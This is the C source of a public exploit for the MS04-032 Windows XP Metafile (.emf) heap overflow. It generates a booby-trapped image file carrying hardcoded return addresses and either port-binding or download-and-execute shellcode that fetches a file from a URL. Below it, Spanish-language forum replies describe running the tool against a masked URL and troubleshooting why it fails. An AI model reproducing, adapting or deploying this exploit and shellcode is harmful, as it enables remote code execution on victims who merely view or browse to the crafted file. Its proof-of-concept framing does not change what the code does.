/* HOD-ms04032-emf-expl2.c:
 *
 * (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow
 *
 * Exploit version 0.2 (PUBLIC) coded by
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 * [at inbox dot ru]
 * -------------------------------------------------------------------
 * About WMF/EMF:
 * Windows Metafile (WMF) and Enhanced Windows Metafile (EMF) formats
 * are vector files that can contain a raster image...
 *
 * -------------------------------------------------------------------
 * The vulnerability will be triggered by either viewing a malicious
 * file or by navigating to a directory, which contains a malicious
 * file and displays it as a thumbnail.
 *
 * Graphics Rendering Engine Vulnerability - CAN-2004-0209
 * -------------------------------------------------------------------
 * Tested on:
 *    - Internet Explorer 6.0 (SP1) (iexplore.exe)
 *    - Explorer (explorer.exe)
 *    - Windows XP SP1
 *
 * -------------------------------------------------------------------
 * Compile:
 *    Win32/VC++  : cl HOD-ms04032-emf-expl.c
 *    Win32/cygwin: gcc HOD-ms04032-emf-expl.c -lws2_32.lib
 *    Linux       : gcc -o HOD-ms04032-emf-expl HOD-ms04032-emf-expl.c
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 *   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
 *
 *   Shellcode:
 *        1 - Portbind shellcode
 *        2 - Connectback shellcode
 *
 * -------------------------------------------------------------------
 * Examples:
 *
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 1 7777
 *
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 2 http://host/file.exe
 *
 * -------------------------------------------------------------------
 *
 *   This is provided as proof-of-concept code only for educational
 *   purposes and testing by authorized individuals with permission to
 *   do so.
 *
 */
 
 
/* #define _WIN32 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#include <winsock2.h>
 
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif
 
#include <windows.h>
 
 
unsigned char emfheader[] = 
"\x01\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x20\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x4c\x03\x00\x00\x4c\x03\x00\x00\x20\x45\x4d\x46\x00\x00\x01\x00"
"\x40\x00\x00\x00\x0b\x00\x00\x00\x0a\x00\x00\x00\xff\xff\x00\x00"
 
"\xEB\x12\x90\x90\x90\x90\x90\x90"
"\x9e\x5c\x05\x78"   /* call [edi+0x74h] - rpcrt4.dll */
"\xb4\x73\xed\x77";   /* Top SEH          - XP SP1 */
 
 
unsigned char portbind_sc[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
 
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff"
"\xff\xff\x8b\xc5\x83\xc0\x11\x33\xc9\x66\xb9\xc9\x01\x80\x30\x88"
"\x40\xe2\xfa\xdd\x03\x64\x03\x7c\x09\x64\x08\x88\x88\x88\x60\xc4"
"\x89\x88\x88\x01\xce\x74\x77\xfe\x74\xe0\x06\xc6\x86\x64\x60\xd9"
"\x89\x88\x88\x01\xce\x4e\xe0\xbb\xba\x88\x88\xe0\xff\xfb\xba\xd7"
"\xdc\x77\xde\x4e\x01\xce\x70\x77\xfe\x74\xe0\x25\x51\x8d\x46\x60"
"\xb8\x89\x88\x88\x01\xce\x5a\x77\xfe\x74\xe0\xfa\x76\x3b\x9e\x60"
"\xa8\x89\x88\x88\x01\xce\x46\x77\xfe\x74\xe0\x67\x46\x68\xe8\x60"
"\x98\x89\x88\x88\x01\xce\x42\x77\xfe\x70\xe0\x43\x65\x74\xb3\x60"
"\x88\x89\x88\x88\x01\xce\x7c\x77\xfe\x70\xe0\x51\x81\x7d\x25\x60"
"\x78\x88\x88\x88\x01\xce\x78\x77\xfe\x70\xe0\x2c\x92\xf8\x4f\x60"
"\x68\x88\x88\x88\x01\xce\x64\x77\xfe\x70\xe0\x2c\x25\xa6\x61\x60"
"\x58\x88\x88\x88\x01\xce\x60\x77\xfe\x70\xe0\x6d\xc1\x0e\xc1\x60"
"\x48\x88\x88\x88\x01\xce\x6a\x77\xfe\x70\xe0\x6f\xf1\x4e\xf1\x60"
"\x38\x88\x88\x88\x01\xce\x5e\xbb\x77\x09\x64\x7c\x89\x88\x88\xdc"
"\xe0\x89\x89\x88\x88\x77\xde\x7c\xd8\xd8\xd8\xd8\xc8\xd8\xc8\xd8"
"\x77\xde\x78\x03\x50\xdf\xdf\xe0\x8a\x88\xAB\x6F\x03\x44\xe2\x9e"
"\xd9\xdb\x77\xde\x64\xdf\xdb\x77\xde\x60\xbb\x77\xdf\xd9\xdb\x77"
"\xde\x6a\x03\x58\x01\xce\x36\xe0\xeb\xe5\xec\x88\x01\xee\x4a\x0b"
"\x4c\x24\x05\xb4\xac\xbb\x48\xbb\x41\x08\x49\x9d\x23\x6a\x75\x4e"
"\xcc\xac\x98\xcc\x76\xcc\xac\xb5\x01\xdc\xac\xc0\x01\xdc\xac\xc4"
"\x01\xdc\xac\xd8\x05\xcc\xac\x98\xdc\xd8\xd9\xd9\xd9\xc9\xd9\xc1"
"\xd9\xd9\x77\xfe\x4a\xd9\x77\xde\x46\x03\x44\xe2\x77\x77\xb9\x77"
"\xde\x5a\x03\x40\x77\xfe\x36\x77\xde\x5e\x63\x16\x77\xde\x9c\xde"
"\xec\x29\xb8\x88\x88\x88\x03\xc8\x84\x03\xf8\x94\x25\x03\xc8\x80"
"\xd6\x4a\x8c\x88\xdb\xdd\xde\xdf\x03\xe4\xac\x90\x03\xcd\xb4\x03"
"\xdc\x8d\xf0\x8b\x5d\x03\xc2\x90\x03\xd2\xa8\x8b\x55\x6b\xba\xc1"
"\x03\xbc\x03\x8b\x7d\xbb\x77\x74\xbb\x48\x24\xb2\x4c\xfc\x8f\x49"
"\x47\x85\x8b\x70\x63\x7a\xb3\xf4\xac\x9c\xfd\x69\x03\xd2\xac\x8b"
"\x55\xee\x03\x84\xc3\x03\xd2\x94\x8b\x55\x03\x8c\x03\x8b\x4d\x63"
"\x8a\xbb\x48\x03\x5d\xd7\xd6\xd5\xd3\x4a\x8c\x88";
 
 
unsigned char download_sc[]=
"\x90\x90\x90\x90\x90\x90\x90\x90"
 
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17""HOD""\x21";
 
unsigned char endoffile[] = "\x00\x00\x00\x00";
 
 
void
usage(char *prog)
{
   printf("Usage:\n");
   printf("%s <file> <shellcode> <bindport / url>\n", prog);
   printf("\nShellcode:\n");
   printf("      1 - Portbind shellcode\n");
   printf("      2 - Download & exec shellcode\n\n");
   exit(0);
}
 
 
int
main(int argc, char **argv)
{
   char endofurl = '\x01';
   unsigned short port;
   int sc;
   FILE *fp;
 
   printf("\n(MS04-032) Microsoft Windows XP Metafile
(.emf) Heap Overflow\n\n");
   printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");
 
   if (argc < 4) usage(argv[0]);
 
   sc = atoi(argv[2]);
   if ((sc > 2) || (sc < 1)) usage(argv[0]);
 
   fp = fopen(argv[1], "wb");
   if (fp == NULL) {
      printf("[-] error: can\'t create file: %s\n", argv[1]);
      exit(0);
   }
 
   /* header */
   fwrite(emfheader, 1, sizeof(emfheader)-1, fp);
 
   printf("

• Shellcode: ");

   if (sc == 1) {
      port = atoi(argv[3]);
      printf("Portbind, port = %u\n", port);
      port = htons(port^(unsigned short)0x8888);
      memcpy(portbind_sc+266, &port, 2);
      fwrite(portbind_sc, 1, sizeof(portbind_sc)-1, fp);
      fwrite(endoffile, 1, 4, fp);
   }
   else {
      printf("Download & exec, url = %s\n", argv[3]);
      fwrite(download_sc, 1, sizeof(download_sc)-1,
fp);
      fwrite(argv[3], 1, strlen(argv[3]), fp);
      fwrite(&endofurl, 1, 1, fp);
      fwrite(endoffile, 1, 4, fp);
   }
 
   printf("

• Ok\n");

   fclose(fp);
 
return 0;
}

Hola: una pregunta he ejecutado el exploit asi c:\meta nombre del archivo 2 url, en nombre del archivo va cualquier nombre?. Si es asi lo ejecute y me aparece esto:

C:\>meta.exe archivo.emf 2 www.********.com

(MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow

--- Coded by .::[ houseofdabus ]::. ---

 Shellcode: Download & exec, url = www.********.com
 Ok

C:\>

Luego voy a la unidad C: y esta el archivo creado "archivo.emf", le doy doble click pero no pasa na´, que hay que hacer??.

Saludetes.

Miren, el exploit Petea hasta un punto determinado, es asi de simple, cuando se le da te bota una pantalla de download pero en  milisegundo, que no te deja ver como que sta bajando, hay algo que esta mal definitivamente, pero para eso estamos todos para estudiar dicho exploit.

Saludos.

Man-In-the-Middle

IQaL, no rula, bueno ya testie, y no passssa nada, solo me bota el pantallaso

saludos

Man-In-the-Middle